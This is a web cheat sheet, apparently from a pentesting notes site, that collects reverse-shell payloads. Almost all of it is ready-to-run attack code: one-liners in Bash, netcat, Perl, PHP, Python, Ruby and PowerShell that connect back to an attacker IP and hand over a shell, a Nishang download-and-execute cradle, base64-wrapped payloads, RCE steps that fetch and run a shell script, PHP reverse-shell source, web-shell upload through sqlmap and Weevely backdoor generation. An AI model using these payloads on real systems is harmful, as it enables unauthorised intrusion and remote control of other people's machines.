Exploit Notes

Reverse Shell Cheat Sheet

Last modified: 2023-03-10

Privilege Escalation Reverse Shell Windows

Preparation

First of all, we need to start listener in local machine to get an incoming connection.

nc -lvnp 4444

Cheat Sheets

Bash

bash -i >&  /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'

# For URL param
bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

Ncat

ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash

nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc --udp 10.0.0.1 4444 -e /bin/bash

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Script File

    If we pass the script to php binary, create a PHP script as follow.

    // shell.php
    use Socket;
    $i="10.0.0.1";
    $p=4444;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
    if(connect(S,sockaddr_in($p,inet_aton($i)))){
        open(STDIN,">&S");
        open(STDOUT,">&S");
        open(STDERR,">&S");
        exec("/bin/sh -i");
    };
    

    Then run php.

    php ./shell.php
    

PHP

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Nishang

Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.

  1. Preparing the Payload in Your Local Machine

    First off, copy the payload to the current working directory.

    cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
    mv Invoke-PowerShellTcp.ps1 shell.ps1
    

    Add the following code to the final line in the payload (shell.ps1).

    Invoke-PowerShellTcp -Reverse  -IPAddress <your-local-ip> -Port 4444
    
  2. Opening Wev Server in Your Local Machine

    To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.

    python3 -m http.server 8000
    
  3. Downloading the Payload and Executing Reverse Shell

    In the target machine, download the local-hosted payload and run reverse shell.

    cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')
    

Reverse Shell with Base64

First create the base64 which executes reverse shell.

echo -n 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' | base64

Then copy the base64 text and paste into the payload.

echo -n "<Base64>" | base64 -d | bash

Reverse Shell over Websites

Shell Script & Remote Code Execution (RCE)

If we can find a website is vulnerable to Remote Code Execution but cannot Reverse Shell, we may be able to do that by uploading the script.

  1. Create a shell script to reverse shell.

    This file is named "revshell.sh".

    #!/bin/bash
    bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
    
  2. Upload the script to website

    Start web server in local machine to upload the script.

    python3 -m http.server 8000
    

    Then upload it by remote code execution in target website.

    https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
    # or
    https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh
    

    To confirm the script uploaded, execute the following RCE.

    https://vulnerable.com/?cmd=ls
    
  3. Get a shell

    Start listener for getting a shell in local machine.

    nc -lvnp 4444
    

    Now execute the uploaded script via RCE.

    # 1. Change permission for the script
    https://vulenrable.com/?cmd=chmod 777 revshell.sh
    # 2. Execute the script
    https://vulnerable.com/?cmd=./revshell.sh
    

    We should now get the target shell.

PHP Reverse Shell

php-reverse-shell is an awesome payload against a website using PHP.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit $ip and $port to your local ip:port in the payload

Update `$ip` and `$port` in the payload to your local ip and port.
Then upload the payload, or copy the content and paste to somewhere in the target website directly, and reload the page.

PHP Reverse Shell (without fsockopen, and for FreeBSD)

<?php
set_time_limit (0);
$ip = '10.0.0.1';  // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a")   // stderr is a pipe that the child will write to
);

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');
    fclose($pipes[0]);

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

PHP Reverse Shell for Windows

We can get the payload in here.

Upload the Payload using SQLi

# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      Credentials required.

      weevely generate <password> ./shell.php
      
    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami
      
    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>
      

Pwncat

Pwncat is a reverse and bind shell handler.

For listening from remote connection, run the following command.

pwncat-cs -lp 4444

Commands in Pwncat Shell

After reverse connecting, we can execute commands either local or remote.

# Switch between Local and Remote shell
Ctrl+D

# Upload a file to target machine (e.g. upload example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt

Upgrade to a Full Functional Shell

After connecting to the target shell with reverse shell, it's recommended to make the shell to be more elegant.

SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

The commands below make our shell even more perfect.

Ctrl+z
stty raw -echo;fg
Enter x2
export TERM=xterm

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.